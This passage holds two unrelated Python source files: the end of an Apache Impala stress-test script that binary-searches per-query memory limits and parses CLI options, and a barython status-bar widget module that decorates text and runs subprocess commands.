with and without spilling. Potentially all fields in the Query class (except
'sql') will be populated by this method. 'required_mem_mb_without_spilling' and
the corresponding runtime field may still be None if the query could not be run
without spilling.
converted_args.samples and converted_args.max_conflicting_samples control the
reliability of the collected information. The problem is that memory spilling or usage
may differ (by a large amount) from run to run due to races during execution. The
parameters provide a way to express "X out of Y runs must have resulted in the same
outcome". Increasing the number of samples and decreasing the tolerance (max conflicts)
increases confidence but also increases the time to collect the data.
"""
LOG.info("Collecting runtime info for query %s: \n%s", query.name, query.sql)
samples = converted_args.samples
max_conflicting_samples = converted_args.max_conflicting_samples
results_dir = converted_args.results_dir
mem_limit_eq_threshold_mb = converted_args.mem_limit_eq_threshold_mb
mem_limit_eq_threshold_percent = converted_args.mem_limit_eq_threshold_percent
runner = QueryRunner(impalad=impala.impalads[0], results_dir=results_dir,
common_query_options=converted_args.common_query_options,
test_admission_control=converted_args.test_admission_control,
use_kerberos=converted_args.use_kerberos, check_if_mem_was_spilled=True)
runner.connect()
limit_exceeded_mem = 0
non_spill_mem = None
spill_mem = None
report = None
mem_limit = None
old_required_mem_mb_without_spilling = query.required_mem_mb_without_spilling
old_required_mem_mb_with_spilling = query.required_mem_mb_with_spilling
profile_error_prefix = query.logical_query_id + "_binsearch_error"
# TODO: This method is complicated enough now that breaking it out into a class may be
# helpful to understand the structure.
def update_runtime_info():
required_mem = min(mem_limit, impala.min_impalad_mem_mb)
if report.mem_was_spilled:
if (
query.required_mem_mb_with_spilling is None or
required_mem < query.required_mem_mb_with_spilling
):
query.required_mem_mb_with_spilling = required_mem
query.solo_runtime_secs_with_spilling = report.runtime_secs
query.solo_runtime_profile_with_spilling = report.profile
elif (
query.required_mem_mb_without_spilling is None or
required_mem < query.required_mem_mb_without_spilling
):
query.required_mem_mb_without_spilling = required_mem
query.solo_runtime_secs_without_spilling = report.runtime_secs
assert report.runtime_secs is not None, report
query.solo_runtime_profile_without_spilling = report.profile
def get_report(desired_outcome=None):
reports_by_outcome = defaultdict(list)
leading_outcome = None
for remaining_samples in xrange(samples - 1, -1, -1):
report = runner.run_query(query, mem_limit, run_set_up=True,
timeout_secs=timeout_secs, retain_profile=True)
if report.timed_out:
report.write_query_profile(
os.path.join(results_dir, PROFILES_DIR), profile_error_prefix)
raise QueryTimeout(
"query {0} timed out during binary search".format(query.logical_query_id))
if report.other_error:
report.write_query_profile(
os.path.join(results_dir, PROFILES_DIR), profile_error_prefix)
raise Exception(
"query {0} errored during binary search: {1}".format(
query.logical_query_id, str(report.other_error)))
LOG.debug("Spilled: %s" % report.mem_was_spilled)
if not report.has_query_error():
if query.result_hash is None:
query.result_hash = report.result_hash
elif query.result_hash != report.result_hash:
report.write_query_profile(
os.path.join(results_dir, PROFILES_DIR), profile_error_prefix)
raise Exception(
"Result hash mismatch for query %s; expected %s, got %s" %
(query.logical_query_id, query.result_hash, report.result_hash))
if report.not_enough_memory:
outcome = "EXCEEDED"
elif report.mem_was_spilled:
outcome = "SPILLED"
else:
outcome = "NOT_SPILLED"
reports_by_outcome[outcome].append(report)
if not leading_outcome:
leading_outcome = outcome
continue
if len(reports_by_outcome[outcome]) > len(reports_by_outcome[leading_outcome]):
leading_outcome = outcome
if len(reports_by_outcome[leading_outcome]) + max_conflicting_samples == samples:
break
if (
len(reports_by_outcome[leading_outcome]) + remaining_samples <
samples - max_conflicting_samples
):
return
if desired_outcome \
and len(reports_by_outcome[desired_outcome]) + remaining_samples \
< samples - max_conflicting_samples:
return
reports = reports_by_outcome[leading_outcome]
reports.sort(key=lambda r: r.runtime_secs)
return reports[len(reports) / 2]
if not any((old_required_mem_mb_with_spilling, old_required_mem_mb_without_spilling)):
mem_estimate = estimate_query_mem_mb_usage(query, runner.impalad_conn)
LOG.info("Finding a starting point for binary search")
mem_limit = min(mem_estimate, impala.min_impalad_mem_mb) or impala.min_impalad_mem_mb
while True:
LOG.info("Next mem_limit: {0}".format(mem_limit))
report = get_report()
if not report or report.not_enough_memory:
if report and report.not_enough_memory:
limit_exceeded_mem = mem_limit
if mem_limit == impala.min_impalad_mem_mb:
LOG.warn(
"Query couldn't be run even when using all available memory\n%s", query.sql)
return
mem_limit = min(2 * mem_limit, impala.min_impalad_mem_mb)
continue
update_runtime_info()
if report.mem_was_spilled:
spill_mem = mem_limit
else:
non_spill_mem = mem_limit
break
LOG.info("Finding minimum memory required to avoid spilling")
lower_bound = max(limit_exceeded_mem, spill_mem)
upper_bound = min(non_spill_mem or maxint, impala.min_impalad_mem_mb)
while True:
if old_required_mem_mb_without_spilling:
mem_limit = old_required_mem_mb_without_spilling
old_required_mem_mb_without_spilling = None
else:
mem_limit = (lower_bound + upper_bound) / 2
LOG.info("Next mem_limit: {0}".format(mem_limit))
should_break = mem_limit / float(upper_bound) > 1 - mem_limit_eq_threshold_percent \
or upper_bound - mem_limit < mem_limit_eq_threshold_mb
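# Example (comment added; 0.025 and 50 MB are the CLI defaults): with
# upper_bound=4000 MB the search stops once mem_limit exceeds
# 4000 * (1 - 0.025) = 3900 MB or comes within 50 MB of upper_bound.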
report = get_report(desired_outcome=("NOT_SPILLED" if spill_mem else None))
if not report:
lower_bound = mem_limit
elif report.not_enough_memory:
lower_bound = mem_limit
limit_exceeded_mem = mem_limit
else:
update_runtime_info()
if report.mem_was_spilled:
lower_bound = mem_limit
spill_mem = min(spill_mem, mem_limit)
else:
upper_bound = mem_limit
non_spill_mem = mem_limit
if mem_limit == impala.min_impalad_mem_mb:
break
if should_break:
if non_spill_mem:
break
lower_bound = upper_bound = impala.min_impalad_mem_mb
# This value may be updated during the search for the absolute minimum.
LOG.info(
"Minimum memory to avoid spilling: %s MB" % query.required_mem_mb_without_spilling)
LOG.info("Finding absolute minimum memory required")
lower_bound = limit_exceeded_mem
upper_bound = min(
spill_mem or maxint, non_spill_mem or maxint, impala.min_impalad_mem_mb)
while True:
if old_required_mem_mb_with_spilling:
mem_limit = old_required_mem_mb_with_spilling
old_required_mem_mb_with_spilling = None
else:
mem_limit = (lower_bound + upper_bound) / 2
LOG.info("Next mem_limit: {0}".format(mem_limit))
should_break = mem_limit / float(upper_bound) > 1 - mem_limit_eq_threshold_percent \
or upper_bound - mem_limit < mem_limit_eq_threshold_mb
report = get_report(desired_outcome="SPILLED")
if not report or report.not_enough_memory:
lower_bound = mem_limit
else:
update_runtime_info()
upper_bound = mem_limit
if should_break:
if not query.required_mem_mb_with_spilling:
if upper_bound - mem_limit < mem_limit_eq_threshold_mb:
# IMPALA-6604: A fair amount of queries go down this path.
LOG.info(
"Unable to find a memory limit with spilling within the threshold of {0} "
"MB. Using the same memory limit for both.".format(
mem_limit_eq_threshold_mb))
query.required_mem_mb_with_spilling = query.required_mem_mb_without_spilling
query.solo_runtime_secs_with_spilling = query.solo_runtime_secs_without_spilling
query.solo_runtime_profile_with_spilling = \
query.solo_runtime_profile_without_spilling
break
LOG.info("Minimum memory is %s MB" % query.required_mem_mb_with_spilling)
if (
query.required_mem_mb_with_spilling is not None and
query.required_mem_mb_without_spilling is not None and
query.required_mem_mb_without_spilling < query.required_mem_mb_with_spilling
):
# Query execution is not deterministic and sometimes a query will run without spilling
# at a lower mem limit than it did with spilling. In that case, just use the lower
# value.
LOG.info(
"A lower memory limit to avoid spilling was found while searching for"
" the absolute minimum memory.")
query.required_mem_mb_with_spilling = query.required_mem_mb_without_spilling
query.solo_runtime_secs_with_spilling = query.solo_runtime_secs_without_spilling
query.solo_runtime_profile_with_spilling = query.solo_runtime_profile_without_spilling
LOG.debug("Query after populating runtime info: %s", query)
def prepare_database(cursor):
"""For each table in the database that cursor is connected to, create an identical copy
with '_original' suffix. This function is idempotent.
Note: At this time we only support Kudu tables with a simple hash partitioning based on
the primary key. (SHOW CREATE TABLE would not work otherwise.)
"""
tables = dict((t, cursor.describe_table(t)) for t in cursor.list_table_names())
for table_name in tables:
if not table_name.endswith("_original") and table_name + "_original" not in tables:
LOG.debug("Creating original table: {0}".format(table_name))
cursor.execute("SHOW CREATE TABLE " + table_name)
create_sql = cursor.fetchone()[0]
search_pattern = r"CREATE TABLE (\w*)\.(.*) \("
replacement = "CREATE TABLE {tbl} (".format(tbl=table_name + "_original")
create_original_sql = re.sub(
search_pattern, replacement, create_sql, count=1)
LOG.debug("Create original SQL:\n{0}".format(create_original_sql))
cursor.execute(create_original_sql)
cursor.execute("INSERT INTO {0}_original SELECT * FROM {0}".format(table_name))
cursor.execute("COMPUTE STATS {0}".format(table_name + "_original"))
def reset_databases(cursor):
"""Reset the database to the initial state. This is done by overwriting tables which
don't have the _original suffix with data from tables with the _original suffix.
Note: At this time we only support Kudu tables with a simple hash partitioning based on
the primary key. (SHOW CREATE TABLE would not work otherwise.)
"""
LOG.info("Resetting {0} database".format(cursor.db_name))
tables = dict((t, cursor.describe_table(t)) for t in cursor.list_table_names())
for table_name in tables:
if not table_name.endswith("_original"):
if table_name + "_original" in tables:
cursor.execute("SHOW CREATE TABLE " + table_name)
create_table_command = cursor.fetchone()[0]
cursor.execute("DROP TABLE {0}".format(table_name))
cursor.execute(create_table_command)
cursor.execute("INSERT INTO {0} SELECT * FROM {0}_original".format(table_name))
cursor.execute("COMPUTE STATS {0}".format(table_name))
else:
LOG.debug("Table '{0}' cannot be reset because '{0}_original' does not"
" exist in '{1}' database.".format(table_name, cursor.db_name))
def populate_all_queries(
queries, impala, converted_args, queries_with_runtime_info_by_db_sql_and_options
):
"""Populate runtime info for all queries, ordered by the population_order property."""
result = []
queries_by_order = {}
for query in queries:
if query.population_order not in queries_by_order:
queries_by_order[query.population_order] = []
queries_by_order[query.population_order].append(query)
for population_order in sorted(queries_by_order.keys()):
for query in queries_by_order[population_order]:
if (
query.sql in
queries_with_runtime_info_by_db_sql_and_options[query.db_name] and
str(sorted(query.options.items())) in
queries_with_runtime_info_by_db_sql_and_options[query.db_name][query.sql]
):
LOG.debug("Reusing previous runtime data for query: " + query.sql)
result.append(queries_with_runtime_info_by_db_sql_and_options[
query.db_name][query.sql][str(sorted(query.options.items()))])
else:
populate_runtime_info(query, impala, converted_args)
save_runtime_info(converted_args.runtime_info_path, query, impala)
query.write_runtime_info_profiles(
os.path.join(converted_args.results_dir, PROFILES_DIR))
result.append(query)
return result
def main():
parser = ArgumentParser(
epilog=dedent("""
Before running this script a CM cluster must be setup and any needed data
such as TPC-H/DS must be loaded. The first time this script is run it will
find memory limits and runtimes for each query and save the data to disk (since
collecting the data is slow) at --runtime-info-path then run the stress test.
Later runs will reuse the saved memory limits and timings. If the cluster changes
significantly the memory limits should be re-measured (deleting the file at
--runtime-info-path will cause re-measuring to happen).""").strip(),
formatter_class=ArgumentDefaultsHelpFormatter)
cli_options.add_logging_options(parser)
cli_options.add_cluster_options(parser)
cli_options.add_kerberos_options(parser)
cli_options.add_ssl_options(parser)
parser.add_argument(
"--runtime-info-path",
default=os.path.join(gettempdir(), "{cm_host}_query_runtime_info.json"),
help="The path to store query runtime info at. '{cm_host}' will be replaced with"
" the actual host name from --cm-host.")
parser.add_argument(
"--samples", default=1, type=int,
help='Used when collecting "runtime info" - the number of samples to collect when'
' testing a particular mem limit value.')
parser.add_argument(
"--max-conflicting-samples", default=0, type=int,
help='Used when collecting "runtime info" - the number of samples outcomes that'
' can disagree when deciding to accept a particular mem limit. Ex, when trying to'
' determine the mem limit that avoids spilling with samples=5 and'
' max-conflicting-samples=1, then 4/5 queries must not spill at a particular mem'
' limit.')
parser.add_argument(
"--mem-limit-eq-threshold-percent", default=0.025,
type=float, help='Used when collecting "runtime info". If the difference between'
' two memory limits is less than this percentage, we consider the two limits to'
' be equal and stop the memory binary search.')
parser.add_argument(
"--mem-limit-eq-threshold-mb", default=50,
type=int, help='Used when collecting "runtime info". If the difference between'
' two memory limits is less than this value in MB, we consider the two limits to'
' be equal and stop the memory binary search.')
parser.add_argument(
"--results-dir", default=gettempdir(),
help="Directory under which the profiles and result_hashes directories are created."
" Query hash results are written in the result_hashes directory. If query results"
" do not match, a log file will be left in that dir. The log file is also created"
" during the first run when runtime info is collected for each query. Unexpected"
" query timeouts, exceeded memory, failures or result mismatches will result in a"
" profile written in the profiles directory.")
parser.add_argument(
"--no-status", action="store_true", help="Do not print the status table.")
parser.add_argument(
"--cancel-current-queries", action="store_true",
help="Cancel any queries running on the cluster before beginning.")
parser.add_argument(
"--filter-query-mem-ratio", type=float, default=0.333,
help="Queries that require this ratio of total available memory will be filtered.")
parser.add_argument(
"--startup-queries-per-second", type=float, default=2.0,
help="Adjust this depending on the cluster size and workload. This determines"
" the minimum amount of time between successive query submissions when"
" the workload is initially ramping up.")
parser.add_argument(
"--fail-upon-successive-errors", type=int, default=1,
help="Continue running until N query errors are encountered in a row. Set"
" this to a high number to only stop when something catastrophic happens. A"
" value of 1 stops upon the first error.")
parser.add_argument(
"--mem-limit-padding-pct", type=int, default=25,
help="Pad query mem limits found by solo execution with this percentage when"
" running concurrently. After padding queries will not be expected to fail"
" due to mem limit exceeded.")
parser.add_argument(
"--mem-limit-padding-abs", type=int, default=0,
help="Pad query mem limits found by solo execution with this value (in megabytes)"
" running concurrently. After padding queries will not be expected to fail"
" due to mem limit exceeded. This is useful if we want to be able to add the same"
" amount of memory to smaller queries as to the big ones.")
parser.add_argument(
"--timeout-multiplier", type=float, default=1.0,
help="Deprecated - has no effect.")
parser.add_argument("--max-queries", type=int, default=100)
parser.add_argument(
"--reset-databases-before-binary-search", action="store_true",
help="If True, databases will be reset to their original state before the binary"
" search.")
parser.add_argument(
"--reset-databases-after-binary-search", action="store_true",
help="If True, databases will be reset to their original state after the binary"
" search and before starting the stress test. The primary intent of this option is"
" to undo the changes made to the databases by the binary search. This option can"
" also be used to reset the databases before running other (non stress) tests on"
" the same data.")
parser.add_argument(
"--generate-dml-queries", action="store_true",
help="If True, DML queries will be generated for Kudu databases.")
parser.add_argument(
"--dml-mod-values", nargs="+", type=int, default=[11],
help="List of mod values to use for the DML queries. There will be 4 DML (delete,"
" insert, update, upsert) queries generated per mod value per table. The smaller"
" the value, the more rows the DML query would touch (the query should touch about"
" 1/mod_value rows.)")
parser.add_argument(
"--generate-compute-stats-queries", action="store_true",
help="If True, Compute Stats queries will be generated.")
parser.add_argument(
"--select-probability", type=float, default=0.5,
help="Probability of choosing a select query (as opposed to a DML query).")
parser.add_argument("--tpcds-db", help="If provided, TPC-DS queries will be used.")
parser.add_argument("--tpch-db", help="If provided, TPC-H queries will be used.")
parser.add_argument(
"--tpch-nested-db", help="If provided, nested TPC-H queries will be used.")
parser.add_argument(
"--tpch-kudu-db", help="If provided, TPC-H queries for Kudu will be used.")
parser.add_argument(
"--tpcds-kudu-db", help="If provided, TPC-DS queries for Kudu will be used.")
parser.add_argument(
"--random-db", help="If provided, random queries will be used.")
parser.add_argument(
"--random-query-count", type=int, default=50,
help="The number of random queries to generate.")
parser.add_argument(
"--random-query-timeout-seconds", type=int, default=(5 * 60),
help="A random query that runs longer than this time when running alone will"
" be discarded.")
parser.add_argument(
"--query-file-path", help="Use queries in the given file. The file"
" format must be the same as standard test case format. Queries are expected to "
" be randomly generated and will be validated before running in stress mode.")
parser.add_argument(
"--query-file-db",
help="The name of the database to use with the queries from --query-file-path.")
parser.add_argument("--mem-overcommit-pct", type=float, default=0)
parser.add_argument(
"--mem-spill-probability", type=float, default=0.33, dest="spill_probability",
help="The probability that a mem limit will be set low enough to induce spilling.")
parser.add_argument(
"--mem-leak-check-interval-mins", type=int, default=None,
help="Periodically stop query execution and check that memory levels have reset.")
parser.add_argument(
"--cancel-probability", type=float, default=0.1,
help="The probability a query will be cancelled.")
parser.add_argument("--nlj-filter", help=SUPPRESS) # Made a no-op by IMPALA-7440.
parser.add_argument(
"--common-query-options", default=None, nargs="*",
help="Space-delimited string of query options and values. This is a freeform "
"string with little regard to whether you've spelled the query options correctly "
"or set valid values. Example: --common-query-options "
"DISABLE_CODEGEN=true RUNTIME_FILTER_MODE=1")
parser.add_argument(
"--test-admission-control", type=bool, default=False,
help="If true, assume that the Impala cluster under test is using memory-based "
"admission control and should not admit queries that cannot be run to completion. "
"In this mode the stress runner does not set mem_limit on queries and "
"out-of-memory errors are not expected in this mode so will fail the stress test "
"if encountered. The stress runner still tracks the 'admitted' memory so that "
"it can try to submit more queries than there is available memory for.")
parser.add_argument(
"--max-coordinators", default=0, type=int, metavar="max coordinators",
help="If > 0, submit queries to at most this number of coordinators."
"This is useful in conjunction with --test-admission-control to test behaviour "
"with a smaller number of admission controller instances.")
args = parser.parse_args()
converted_args = StressArgConverter(args)
cli_options.configure_logging(
args.log_level, debug_log_file=args.debug_log_file, log_thread_name=True,
log_process_id=True)
LOG.debug("CLI args: %s" % (args, ))
if (
not args.tpcds_db and not args.tpch_db and not args.random_db and not
args.tpch_nested_db and not args.tpch_kudu_db and not
args.tpcds_kudu_db and not args.query_file_path
):
raise Exception(
"At least one of --tpcds-db, --tpch-db, --tpch-kudu-db,"
"--tpcds-kudu-db, --tpch-nested-db, --random-db, --query-file-path is required")
result_hashes_path = os.path.join(args.results_dir, RESULT_HASHES_DIR)
if not os.path.isdir(result_hashes_path):
os.makedirs(result_hashes_path)
results_dir_path = os.path.join(args.results_dir, PROFILES_DIR)
if not os.path.isdir(results_dir_path):
os.makedirs(results_dir_path)
cluster = cli_options.create_cluster(args)
impala = cluster.impala
if impala.find_stopped_impalads():
impala.restart()
cluster.print_version()
impala.find_and_set_path_to_running_impalad_binary()
if args.cancel_current_queries and impala.queries_are_running():
impala.cancel_queries()
sleep(10)
if impala.queries_are_running():
raise Exception("Queries are currently running on the cluster")
impala.min_impalad_mem_mb = min(impala.find_impalad_mem_mb_limit())
queries_with_runtime_info_by_db_sql_and_options = load_runtime_info(
converted_args.runtime_info_path, impala)
# Start loading the test queries.
queries = list()
# If random queries were requested, those will be handled later. Unlike random queries,
# the TPC queries are expected to always complete successfully.
if args.tpcds_db:
tpcds_queries = load_tpc_queries("tpcds")
assert len(tpcds_queries) == EXPECTED_TPCDS_QUERIES_COUNT
for query in tpcds_queries:
query.db_name = args.tpcds_db
queries.extend(tpcds_queries)
if args.generate_compute_stats_queries:
with impala.cursor(db_name=args.tpcds_db) as cursor:
queries.extend(generate_compute_stats_queries(cursor))
if args.tpch_db:
tpch_queries = load_tpc_queries("tpch")
assert len(tpch_queries) == EXPECTED_TPCH_STRESS_QUERIES_COUNT
for query in tpch_queries:
query.db_name = args.tpch_db
queries.extend(tpch_queries)
if args.generate_compute_stats_queries:
with impala.cursor(db_name=args.tpch_db) as cursor:
queries.extend(generate_compute_stats_queries(cursor))
if args.tpch_nested_db:
tpch_nested_queries = load_tpc_queries("tpch_nested")
assert len(tpch_nested_queries) == EXPECTED_TPCH_NESTED_QUERIES_COUNT
for query in tpch_nested_queries:
query.db_name = args.tpch_nested_db
queries.extend(tpch_nested_queries)
if args.generate_compute_stats_queries:
with impala.cursor(db_name=args.tpch_nested_db) as cursor:
queries.extend(generate_compute_stats_queries(cursor))
if args.tpch_kudu_db:
tpch_kudu_queries = load_tpc_queries("tpch")
assert len(tpch_kudu_queries) == EXPECTED_TPCH_STRESS_QUERIES_COUNT
for query in tpch_kudu_queries:
query.db_name = args.tpch_kudu_db
queries.extend(tpch_kudu_queries)
if args.generate_compute_stats_queries:
with impala.cursor(db_name=args.tpch_kudu_db) as cursor:
queries.extend(generate_compute_stats_queries(cursor))
if args.generate_dml_queries:
with impala.cursor(db_name=args.tpch_kudu_db) as cursor:
prepare_database(cursor)
queries.extend(generate_DML_queries(cursor, args.dml_mod_values))
if args.tpcds_kudu_db:
tpcds_kudu_queries = load_tpc_queries("tpcds")
assert len(tpcds_kudu_queries) == EXPECTED_TPCDS_QUERIES_COUNT
for query in tpcds_kudu_queries:
query.db_name = args.tpcds_kudu_db
queries.extend(tpcds_kudu_queries)
if args.generate_compute_stats_queries:
with impala.cursor(db_name=args.tpcds_kudu_db) as cursor:
queries.extend(generate_compute_stats_queries(cursor))
if args.generate_dml_queries:
with impala.cursor(db_name=args.tpcds_kudu_db) as cursor:
prepare_database(cursor)
queries.extend(generate_DML_queries(cursor, args.dml_mod_values))
if args.reset_databases_before_binary_search:
for database in set(query.db_name for query in queries):
with impala.cursor(db_name=database) as cursor:
reset_databases(cursor)
queries = populate_all_queries(
queries, impala, converted_args, queries_with_runtime_info_by_db_sql_and_options)
# A particular random query may either fail (due to a generator or Impala bug) or
# take a really long time to complete. So the queries need to be validated. Since the
# runtime info also needs to be collected, that will serve as validation.
if args.random_db:
queries.extend(load_random_queries_and_populate_runtime_info(impala, converted_args))
if args.query_file_path:
file_queries = load_queries_from_test_file(
args.query_file_path, db_name=args.query_file_db)
shuffle(file_queries)
queries.extend(populate_runtime_info_for_random_queries(
impala, file_queries, converted_args))
# Apply tweaks to the query's runtime info as requested by CLI options.
for idx in xrange(len(queries) - 1, -1, -1):
query = queries[idx]
if query.required_mem_mb_with_spilling:
query.required_mem_mb_with_spilling += int(
query.required_mem_mb_with_spilling * args.mem_limit_padding_pct / 100.0) + \
args.mem_limit_padding_abs
if query.required_mem_mb_without_spilling:
query.required_mem_mb_without_spilling += int(
query.required_mem_mb_without_spilling * args.mem_limit_padding_pct / 100.0) + \
args.mem_limit_padding_abs
# Remove any queries that would use "too many" resources. This way a larger number
# of queries will run concurrently.
if query.required_mem_mb_without_spilling is not None and \
query.required_mem_mb_without_spilling / float(impala.min_impalad_mem_mb) \
> args.filter_query_mem_ratio:
LOG.debug(
"Filtering non-spilling query that exceeds "
"--filter-query-mem-ratio: " + query.sql)
query.required_mem_mb_without_spilling = None
if query.required_mem_mb_with_spilling is None \
or query.required_mem_mb_with_spilling / float(impala.min_impalad_mem_mb) \
> args.filter_query_mem_ratio:
LOG.debug("Filtering query that exceeds --filter-query-mem-ratio: " + query.sql)
del queries[idx]
if len(queries) == 0:
raise Exception("All queries were filtered")
print("Using %s queries" % len(queries))
# After the binary search phase finishes, it may be a good idea to reset the database
# again to start the stress test from a clean state.
if args.reset_databases_after_binary_search:
for database in set(query.db_name for query in queries):
with impala.cursor(db_name=database) as cursor:
reset_databases(cursor)
LOG.info("Number of queries in the list: {0}".format(len(queries)))
stress_runner = StressRunner()
stress_runner.results_dir = args.results_dir
stress_runner.startup_queries_per_sec = args.startup_queries_per_second
stress_runner.num_successive_errors_needed_to_abort = args.fail_upon_successive_errors
stress_runner.use_kerberos = args.use_kerberos
stress_runner.cancel_probability = args.cancel_probability
stress_runner.spill_probability = args.spill_probability
stress_runner.leak_check_interval_mins = args.mem_leak_check_interval_mins
stress_runner.common_query_options = converted_args.common_query_options
stress_runner.test_admission_control = converted_args.test_admission_control
stress_runner.max_coordinators = converted_args.max_coordinators
stress_runner.run_queries(
queries, impala, args.max_queries, args.mem_overcommit_pct,
should_print_status=not args.no_status,
verify_results=not args.generate_dml_queries,
select_probability=args.select_probability)
if __name__ == "__main__":
main()
|
base.py
|
#!/usr/bin/env python3
import fcntl
import logging
import os
import shlex
import subprocess
import threading
from barython.hooks import HooksPool
from barython.tools import splitted_sleep
logger = logging.getLogger("barython")
def protect_handler(handler):
def handler_wrapper(self, *args, **kwargs):
# Skip the event if the refresh semaphore is already saturated, and only
# release it when it was actually acquired.
if not self._refresh_lock.acquire(blocking=False):
return
try:
result = handler(self, *args, **kwargs)
finally:
try:
self._refresh_lock.release()
except RuntimeError:
pass
return result
return handler_wrapper
class Widget():
"""
Basic Widget
"""
#: cache the content after update
_content = None
_icon = None
_refresh = -1
@property
def content(self):
return self._content
@property
def icon(self):
return self._icon
@icon.setter
def icon(self, value):
self._icon = value
@property
def refresh(self):
if self._refresh == -1 and self.screens:
return min([screen.refresh for screen in self.screens])
else:
return max(0, self._refresh)
@refresh.setter
def refresh(self, value):
self._refresh = value
def decorate(self, text, fg=None, bg=None, padding=0, font=None, icon=None,
actions=None):
"""
Decorate a text with custom properties
:param fg: foreground
:param bg: background
:param padding: padding around the text
:param font: index of font to use
:param actions: dict of actions
"""
try:
joined_actions = "".join(
"%{{A{}:{}:}}".format(a, cmd) for a, cmd in actions.items()
)
except (TypeError, AttributeError):
joined_actions = ""
# if colors are reset in text, padding will not have the good colors
if padding and text:
padding_str = self.decorate(padding * " ", fg=fg, bg=bg, font=font)
else:
padding_str = ""
return (12*"{}").format(
joined_actions,
padding_str,
"%{{B{}}}".format(bg) if bg else "",
"%{{F{}}}".format(fg) if fg else "",
"%{{T{}}}".format(font) if font else "",
icon + " " if icon else "",
text,
"%{{T-}}".format(font) if font else "",
"%{F-}" if fg else "",
"%{B-}" if bg else "",
padding_str,
"%{A}" * len(actions) if actions else "",
)
def decorate_with_self_attributes(self, text, *args, **kwargs):
"""
Return self.decorate but uses self attributes for default values
"""
d_kwargs = {
"fg": self.fg, "bg": self.bg, "padding": self.padding,
"font": self.fonts[0] if self.fonts else None,
"actions": self.actions, **kwargs
}
for parameter, value in zip(("fg", "bg", "padding", "font", "actions"),
args):
d_kwargs[parameter] = value
return self.decorate(text, **d_kwargs)
def trigger_global_update(self, output=None, *args, **kwargs):
new_content = self.decorate_with_self_attributes(output)
self._update_screens(new_content)
@protect_handler
def handler(self, *args, **kwargs):
"""
To use with hooks
"""
with self._lock_update:
self.update()
splitted_sleep(self.refresh, stop=self._stop.is_set)
def organize_result(self, *args, **kwargs):
"""
Organize the info to show from the split pieces of info received
Organize the panel without handling the decoration (fg, bg, etc…)
Override this method to change the way the info is printed
"""
result = "{} ".format(self.icon) if self.icon else ""
return result + "".join(*args, *kwargs.values())
def _update_screens(self, new_content):
"""
If content has changed, request the screen update
"""
if self._content != new_content:
self._content = new_content
for screen in self.screens:
threading.Thread(target=screen.update).start()
def continuous_update(self):
while not self._stop.is_set():
try:
self.update()
except Exception as e:
logger.error(e)
splitted_sleep(self.refresh, stop=self._stop.is_set)
def update(self):
pass
def propage_hooks_changes(self):
"""
Propage a change in the hooks pool
"""
if getattr(self, "screens", None):
for s in self.screens:
s.hooks.merge(self)
def start(self, *args, **kwargs):
self._stop.clear()
try:
if not self._lock_start.acquire(blocking=False):
return
if self.infinite:
self.continuous_update()
else:
self.update()
finally:
if self._lock_start:
try:
self._lock_start.release()
except RuntimeError:
pass
def stop(self):
self._stop.set()
def __init__(self, bg=None, fg=None, padding=0, fonts=None, icon="",
actions=None, refresh=-1, screens=None, infinite=False):
#: background for the widget
self.bg = bg
#: foreground for the widget
self.fg = fg
#: list of fonts index used
self.fonts = fonts if fonts is not None else tuple()
#: icon to use. Can be a string or a dict for some widgets, where icon
# will depend on the current value.
self._icon = icon
#: dictionary of actions
self.actions = actions if actions is not None else dict()
#: padding
self.padding = padding
#: refresh rate
self.refresh = refresh
#: screens linked. Used for callbacks
self.screens = screens if screens is not None else set()
#: pool of hooks
self.hooks = HooksPool(parent=self)
#: run in an infinite loop or not
self.infinite = infinite
#: event to stop the widget
self._stop = threading.Event()
self._lock_start = threading.Condition()
self._lock_update = threading.Condition()
self._refresh_lock = threading.Semaphore(2)
class TextWidget(Widget):
text = ""
def update(self):
with self._lock_update:
new_content = self.decorate_with_self_attributes(
self.organize_result(self.text)
)
self._update_screens(new_content)
def start(self):
with self._lock_start:
self.update()
def __init__(self, text=None, *args, **kwargs):
super().__init__(*args, **kwargs)
self.text = self.text if text is None else text
self.infinite = False
class SubprocessWidget(Widget):
"""
Run a subprocess in a loop
"""
_subscribe_subproc = None
_subproc = None
def _no_blocking_read(self, output):
"""
Set the output to be non-blocking and read it
"""
fd = output.fileno()
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
try:
result = output.read()
except:
result = b""
fcntl.fcntl(fd, fcntl.F_SETFL, fl)
return result
def _init_subprocess(self, cmd):
"""
Start cmd in a subprocess, and split it if needed
"""
if self._stop.is_set():
return None
if isinstance(cmd, str):
cmd = shlex.split(cmd)
logger.debug("Launching {}".format(" ".join(cmd)))
return subprocess.Popen(
cmd, stdout=subprocess.PIPE, shell=self.shell, env=self.env
)
def _init_subscribe_subproc(self):
process_dead = (
self._subscribe_subproc is None or
self._subscribe_subproc.poll() is not None
)
if process_dead:
self._subscribe_subproc = self._init_subprocess(
self.subscribe_cmd
)
def notify(self, *args, **kwargs):
if self.subscribe_cmd:
self._init_subscribe_subproc()
self._subscribe_subproc.stdout.readline()
# hack to flush the stdout
try:
self._no_blocking_read(self._subscribe_subproc.stdout)
except:
pass
return True
def continuous_update(self):
while not self._stop.is_set():
try:
self.update()
except Exception as e:
logger.error(e)
try:
self._subproc.terminate()
except:
pass
finally:
splitted_sleep(self.refresh, stop=self._stop.is_set)
self.notify()
try:
self._subproc.terminate()
except:
pass
def update(self, *args, **kwargs):
with self._lock_update:
self._subproc = self._init_subprocess(self.cmd)
output = self._subproc.stdout.readline()
if output != b"":
self.trigger_global_update(self.organize_result(
output.decode().replace('\n', '').replace('\r', '')
))
if self._subproc.poll() is not None:
self._subproc = self._subproc.terminate()
def stop(self, *args, **kwargs):
super().stop(*args, **kwargs)
try:
self._subscribe_subproc.terminate()
self._subscribe_subproc = self._subscribe_subproc.wait()
except:
pass
try:
self._subproc = self._subproc.terminate()
self._subproc = self._subproc.wait()
except:
pass
def __init__(self, cmd, subscribe_cmd=None, shell=False, infinite=True,
*args, **kwargs):
super().__init__(*args, **kwargs, infinite=infinite)
#: override environment variables to get the same output everywhere
self.env = dict(os.environ)
self.env["LANG"] = "en_US"
#: command to run. Can be an iterable or a string
self.cmd = cmd
#: used as a notifier: run this command, wait for any output, then re-run
# cmd.
self.subscribe_cmd = subscribe_cmd
#: value for the subprocess.Popen shell parameter. Default to False
self.shell = shell
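# Usage sketch (comment added; the commands are examples, not part of barython):
# a widget that prints the PulseAudio volume and refreshes whenever
# `pactl subscribe` reports an event:
#
#   volume = SubprocessWidget(cmd="pamixer --get-volume",
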